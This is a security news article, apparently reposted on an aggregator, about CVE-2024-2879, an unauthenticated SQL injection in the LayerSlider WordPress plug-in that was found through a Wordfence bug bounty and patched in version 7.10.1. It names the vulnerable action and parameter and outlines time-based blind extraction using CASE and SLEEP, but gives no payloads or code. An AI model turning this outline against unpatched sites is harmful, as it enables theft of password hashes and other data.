Critical Security Flaw Exposes 1 Million WordPress Sites to SQL Injection

A researcher received a $5,500 bug bounty for discovering a vulnerability (CVE-2024-2879) in LayerSlider, a plug-in with more than a million active installations.

Attackers can exploit a critical SQL injection vulnerability found in a widely used
WordPress plug-in
to compromise more than 1 million sites and extract sensitive data such as password hashes from associated databases.
A security researcher called
AmrAwad
(aka 1337_Wannabe) discovered the bug in the LayerSlider, a plug-in for creating animated Web content. The security flaw, tracked as
CVE-2024-2879
, has a rating of 9.8 out of 10 on the CVSS 3.0 vulnerability-severity scale, and is associated with the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 of LayerSlider. The vulnerability is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query, according to Wordfence.
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database, the company said.
Wordfence awarded the researcher a bounty of $5,500 — the companys highest bounty to date — for the discovery, according to a
blog post
by Wordfence. AmrAwads March 25 submission came as part of Wordfences second Bug Bounty Extravaganza, and the company contacted the Kreatura Team, developers of the plug-in, the same day to notify them of the flaw. The team responded the next day and delivered a patch in version 7.10.1 of LayerSlider on March 27.
The potential for exploitation of the vulnerability lies in the insecure implementation of the LayerSlider plug-ins slider popup markup query functionality, which has an id parameter, according to Wordfence.
According to the firm, if the id parameter is not a number, it is passed without sanitization to the find() function in the LS_Sliders class, which queries the sliders in a way that constructs a statement without the prepare() function.
Since that function would parameterize and escape the SQL query for safe execution in WordPress, thereby providing protection against SQL injection attacks, its absence creates a vulnerable scenario, according to Wordfence.
However, to exploit the flaw requires a a time-based blind approach on the part of attackers to extract database information, which is an intricate, yet frequently successful method to obtain information from a database when exploiting
SQL Injection
vulnerabilities, according to Wordfence.
This means that they would need to use SQL CASE statements along with the SLEEP() command while observing the response time of each request to steal information from the database, the company explained.
Vulnerable
WordPress sites

are a popular target
for attackers given the content management systems widespread use across the Internet, and often
vulnerabilities exist in plug-ins
that independent developers create for adding functionality to sites using the platform.
Indeed, at least
43% of websites on the entire Internet
use WordPress to power their sites, e-commerce applications, and communities. Further, the wealth of sensitive data such as user passwords and payment info often stored within their pages represents a significant opportunity for threat actors who seek to misuse it.
Making the WordPress ecosystem more secure ... ultimately makes the entire web more secure, WordPress noted.
Wordfence advised that WordPress users with LayerSlider installed on sites verify immediately that they are updated to the latest, patched version of the plug-in to ensure it isnt vulnerable to exploit.

Last News
▸ Mobile release coming soon for Black Hat 2013REG. ◂ Discovered: 26/12/2024 Category: security	▸ Avoid NSA surveillance with these 7 tips. ◂ Discovered: 26/12/2024 Category: security	▸ Snowden, whistleblower who exposed NSA Prism, deserves a medal. ◂ Discovered: 26/12/2024 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Critical Security Flaw Exposes 1 Million WordPress Sites to SQL Injection